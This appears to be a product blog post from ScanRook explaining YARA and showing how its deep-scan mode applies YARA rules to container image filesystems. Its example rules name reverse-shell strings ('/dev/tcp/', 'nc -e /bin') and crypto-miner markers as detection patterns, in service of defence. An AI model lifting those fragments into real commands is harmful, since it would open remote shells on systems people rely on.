Deep scanning

What Is YARA and Why Security Teams Use It

Name: ScanRook
Author: ScanRook

YARA is often described as the pattern-matching Swiss Army knife of the security world. It gives analysts a simple, declarative language for writing rules that identify and classify files based on textual or binary patterns. From malware research labs to production CI/CD pipelines, YARA rules are one of the most widely deployed tools for detecting known threats inside artifacts of every kind.

History of YARA

YARA was created by Victor Alvarez while working at VirusTotal. He needed a way to describe malware families using textual or binary patterns so that samples could be classified automatically at scale. The project was open-sourced, and the name stands for "Yet Another Recursive/Ridiculous Acronym" -- a nod to the long tradition of recursive acronyms in computing.

Since its release, YARA has been adopted by security teams worldwide. Antivirus vendors, threat intelligence platforms, incident response teams, and open-source scanning tools all rely on YARA rules as a common language for expressing indicators of compromise. Its simplicity and flexibility have made it the de facto standard for file-level pattern matching in security operations.

How YARA Rules Work

A YARA rule has three main sections. The meta section contains descriptive information about the rule, such as its author, description, and threat category. The strings section defines the patterns to search for -- these can be plain text, hexadecimal byte sequences, or regular expressions. The condition section specifies the logic for when the rule should trigger, such as requiring all strings to match, any one string to match, or a minimum count.

rule detect_reverse_shell {
    meta:
        author = "security-team"
        description = "Detects common reverse shell patterns"
        severity = "critical"
    strings:
        $bash_tcp = "/dev/tcp/" ascii
        $nc_exec = "nc -e /bin" ascii
        $python_socket = "socket.socket" ascii
    condition:
        any of them
}

When YARA evaluates a file against this rule, it scans the file contents for the defined string patterns and evaluates the condition. If the condition is satisfied, the rule fires and the match is reported along with the rule's metadata.

Common Use Cases

YARA rules are used across a wide range of security workflows:

Malware detection -- identifying known malware families by their unique byte patterns, strings, or structural characteristics.
Incident response triage -- quickly classifying suspicious files during an investigation to determine what category of threat they belong to.
Threat hunting -- scanning file systems, network captures, and memory dumps for indicators of compromise that match known threat intelligence.
CI/CD security gates -- running YARA rules against build artifacts before deployment to catch threats that package-level scanning would miss.
Container image inspection -- scanning the full filesystem of a container image for malicious payloads that were injected during the build process or pulled in through compromised base images.

YARA in Container Scanning

Traditional container scanners focus almost exclusively on checking installed package versions against vulnerability databases like the NVD and OSV. This approach catches known CVEs in declared dependencies, but it has a blind spot: it cannot detect threats that exist as standalone files within the image filesystem.

YARA fills this gap by enabling detection of threats that package-level scanning misses entirely:

Embedded crypto miners -- binaries like xmrig or custom mining tools dropped into image layers.
Web shells -- PHP, JSP, or ASP scripts planted in web-accessible directories within application images.
Reverse shell backdoors -- scripts or binaries that establish outbound connections to attacker-controlled infrastructure.
Hardcoded secrets and API keys -- credentials embedded directly in configuration files or application code baked into the image.
Obfuscated malicious payloads -- base64-encoded or otherwise obfuscated code that YARA can detect through characteristic encoding patterns and entropy analysis.

How ScanRook Integrates YARA

ScanRook supports YARA scanning through its deep scan mode. When invoked with --mode deep, ScanRook extracts the full container filesystem from the image tar and applies YARA rules against every file in the extracted tree. This runs alongside the standard package-level vulnerability enrichment, so a single scan produces both CVE findings from package analysis and threat findings from YARA pattern matching.

ScanRook ships with a set of bundled default rules that cover common threat categories including crypto miners, web shells, reverse shells, and credential patterns. For teams with their own threat intelligence, custom YARA rules can be supplied via the --yara path/to/rules/ flag. ScanRook will load all .yar and .yara files from the specified directory and apply them alongside the defaults.

Example: Detecting a Crypto Miner

Consider a Docker image based on Alpine that has been tampered with to include an xmrig binary. The Dockerfile looks innocent -- it installs standard packages and copies application code -- but a compromised build step has embedded the mining binary at /usr/local/bin/.sysupdate. A standard package-version scanner would report zero findings because xmrig is not an installed package; it's a standalone binary dropped into the filesystem.

A YARA rule targeting crypto miners can match on characteristic strings like mining pool connection URLs, stratum protocol identifiers, or xmrig's own configuration keys:

rule crypto_miner_indicators {
    meta:
        description = "Detects crypto mining tool indicators"
        severity = "high"
    strings:
        $pool = "stratum+tcp://" ascii
        $xmrig = "xmrig" ascii nocase
        $mining = "mining.pool" ascii
        $wallet = /[13][a-km-zA-HJ-NP-Z1-9]{25,34}/ ascii
    condition:
        2 of them
}

When ScanRook runs a deep scan against the image tar, it extracts all layers, reconstructs the filesystem, and applies this rule against every file. The hidden binary at /usr/local/bin/.sysupdate matches on both the stratum protocol string and the xmrig identifier. ScanRook reports the finding with the matched rule name, the file path, and the matched strings as evidence, giving the security team exactly what they need to investigate and remediate.

Getting Started with YARA in ScanRook

Running a deep scan with YARA is straightforward. Use the --mode deep flag to enable filesystem-level scanning with the bundled rules:

# Deep scan with bundled YARA rules
scanrook scan --file image.tar --mode deep --format json

# Deep scan with custom rules directory
scanrook scan --file image.tar --mode deep --yara ./my-rules/ --format json

# Deep scan with both JSON report and text summary
scanrook scan --file image.tar --mode deep --format json --out report.json

YARA findings appear in the report alongside CVE findings from package-level analysis. Each YARA finding includes the rule name, matched file path, matched strings, and the severity level defined in the rule's metadata. This gives teams a single, unified view of both known vulnerabilities and behavioral threats in their container images.